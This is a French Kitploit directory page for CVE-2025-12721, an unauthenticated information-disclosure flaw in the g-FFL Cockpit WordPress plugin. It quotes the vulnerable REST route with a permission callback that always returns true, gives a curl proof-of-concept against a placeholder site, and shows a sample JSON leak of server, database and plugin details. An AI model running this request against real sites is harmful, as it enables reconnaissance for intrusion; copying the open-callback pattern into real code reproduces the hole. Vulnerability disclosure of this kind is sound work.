Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-12721 — g-FFL Cockpit <= 1.7.1 - Absence d'autorisation menant à une exposition d'informations non authentifiée | Kitploit
Outils/GitHubGitHub/d0n601/cve-2025-12721
Analyse des VulnérabilitésExploitationCollecte d'InformationsSécurité WebTests d'IntrusionMauvaise Configuration
GitHubd0n601/cve-2025-12721

CVE-2025-12721

g-FFL Cockpit <= 1.7.1 - Absence d'autorisation menant à une exposition d'informations non authentifiée

Voir le dépôt
il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

g-FFL Cockpit <= 1.7.1 - Exposition d'informations non authentifiée

Le plugin g-FFL Cockpit n'implémente pas de vérifications d'autorisation appropriées sur le point d'accès REST API server_status, permettant à des utilisateurs non authentifiés d'accéder à des informations sensibles de configuration du serveur, aux paramètres PHP, aux détails de la base de données, aux métadonnées d'installation WordPress et aux informations des plugins actifs via un point d'accès public exposé.

TL;DR Exploits

root@kitploit:~
TARGET_SITE="http://example.com"
curl -X GET $TARGET_SITE/wp-json/fflcockpit/v1/server_status | jq

Détails

La fonction handle_server_status() dans includes/class-sync-endpoint.php récupère et expose des informations complètes du serveur sans nécessiter d'authentification ni de vérification de capacités. Le point d'accès est enregistré avec permission_callback => '__return_true', le rendant complètement accessible à tout visiteur non authentifié.

Situé dans class-sync-endpoint.php :

root@kitploit:~
88:        register_rest_route('fflcockpit/v1', '/server_status', [
89:            'methods' => 'GET',
90:            'callback' => [__CLASS__, 'handle_server_status'],
91:            'permission_callback' => '__return_true', // Public endpoint
92:        ]);

La fonction handle_server_status() expose :

  • Informations serveur : version PHP, système d'exploitation, logiciel serveur, architecture, charge serveur
  • Utilisation mémoire : utilisation mémoire actuelle, pic mémoire, limites mémoire, pourcentages d'utilisation
  • Configuration PHP : limite mémoire, limites de temps d'exécution, limites de téléversement, max input vars, statut OPcache
  • Extensions PHP : statut des extensions chargées (curl, gd, imagick, mbstring, mysql, zip, xml, json, openssl, fileinfo)
  • Informations base de données : version MySQL, charset/collation de la base, variables de configuration MySQL, taille de la base, nombre de requêtes
  • Espace disque : espace libre et total, pourcentages d'utilisation
  • Informations WordPress : version WordPress, statut multisite, statut mode débogage, liste des plugins actifs avec versions et auteurs
  • Informations WooCommerce : statut d'installation, version, paramètres API, nombre de produits/commandes, configuration du gestionnaire de sessions
  • Indicateurs de performance : seuils mémoire, vérifications de temps d'exécution, statut OPcache, alertes d'espace disque, analyse de configuration MySQL

Extrait vulnérable de class-sync-endpoint.php :

root@kitploit:~
1443:                'php_version' => phpversion(),
1444:                'operating_system' => defined('PHP_OS') ? PHP_OS : 'Unknown',
1445:            ];
1446:            
1447:            if (isset($_SERVER['SERVER_SOFTWARE'])) {
1448:                $server_info['server_software'] = $_SERVER['SERVER_SOFTWARE'];
1449:            }

Divulgation supplémentaire dans class-sync-endpoint.php :

root@kitploit:~
1645:                $active_plugins_list = get_option('active_plugins', []);
1646:                $wp_info['active_plugins_count'] = count($active_plugins_list);
1647:                
1648:                if (!function_exists('get_plugins')) {
1649:                    require_once ABSPATH . 'wp-admin/includes/plugin.php';
1650:                }
1651:                $all_plugins = get_plugins();
1652:                
1653:                $plugin_details = [];
1654:                foreach ($active_plugins_list as $plugin_path) {
1655:                    if (isset($all_plugins[$plugin_path])) {
1656:                        $plugin_info = $all_plugins[$plugin_path];
1657:                        $plugin_details[] = [
1658:                            'name' => $plugin_info['Name'] ?? 'Unknown',
1659:                            'version' => $plugin_info['Version'] ?? 'Unknown',
1660:                            'author' => isset($plugin_info['Author']) ? strip_tags($plugin_info['Author']) : 'Unknown',
1661:                            'description' => isset($plugin_info['Description']) ? wp_trim_words(strip_tags($plugin_info['Description']), 20) : '',
1662:                            'path' => $plugin_path,
1663:                            'network' => $plugin_info['Network'] ?? false,
1664:                        ];
1665:                    }
1666:                }

Reproduction manuelle

Note : g-FFL Cockpit nécessite WooCommerce

  1. Accédez au site WordPress cible avec le plugin g-FFL Cockpit installé.
  2. Exécutez la commande curl suivante pour récupérer les informations de statut du serveur :
root@kitploit:~
curl -X GET http://example.com/wp-json/fflcockpit/v1/server_status
  1. Vous recevrez une réponse JSON contenant la configuration complète du serveur, les paramètres PHP, les informations de la base de données, les détails WordPress et WooCommerce, ainsi qu'une liste complète des plugins actifs :
root@kitploit:~
{
  "plugin": {
    "name": "FFL Cockpit",
    "version": "1.7.1"
  },
  "timestamp": "2024-01-15T12:34:56Z",
  "server": {
    "php_version": "8.1.27",
    "operating_system": "Linux",
    "server_software": "Apache/2.4.57",
    "architecture": "x86_64",
    "server_load": [0.52, 0.48, 0.45]
  },
  "memory_usage": {
    "current": "45.23 MB",
    "current_bytes": 47415296,
    "peak": "52.18 MB",
    "peak_bytes": 54722560,
    "limit": "256 MB",
    "limit_bytes": 268435456,
    "usage_percentage": 17.67
  },
  "php_config": {
    "memory_limit": "256M",
    "max_execution_time": "300",
    "max_input_vars": "3000",
    "post_max_size": "64M",
    "upload_max_filesize": "64M",
    "max_file_uploads": "20",
    "opcache_enabled": true,
    "opcache_memory_consumption": 67108864,
    "opcache_hit_rate": 95.23
  },
  "php_extensions": {
    "curl": true,
    "gd": true,
    "imagick": true,
    "mbstring": true,
    "mysql": true,
    "zip": true,
    "xml": true,
    "json": true,
    "openssl": true,
    "fileinfo": true
  },
  "database": {
    "mysql_version": "8.0.35",
    "charset": "utf8mb4",
    "collate": "utf8mb4_unicode_ci",
    "queries_this_request": 42,
    "mysql_config": {
      "max_connections": "151",
      "max_allowed_packet": "67108864",
      "innodb_buffer_pool_size": "134217728"
    },
    "database_size": 125.43
  },
  "disk_space": {
    "free": "15.23 GB",
    "free_bytes": 16357785600,
    "total": "50.00 GB",
    "total_bytes": 53687091200,
    "used_percentage": 69.51
  },
  "wordpress": {
    "version": "6.4.2",
    "multisite": false,
    "debug_enabled": false,
    "cache_enabled": false,
    "active_plugins_count": 12,
    "active_plugins": [
      {
        "name": "g-FFL Cockpit",
        "version": "1.7.1",
        "author": "Garidium LLC",
        "description": "g-FFL Cockpit",
        "path": "g-ffl-cockpit/g-ffl-cockpit.php",
        "network": false
      }
    ]
  },
  "woocommerce": {
    "is_installed": true,
    "version": "8.5.2",
    "api_enabled": true,
    "product_count": 1250,
    "order_count": 342
  }
}
Télécharger l’outil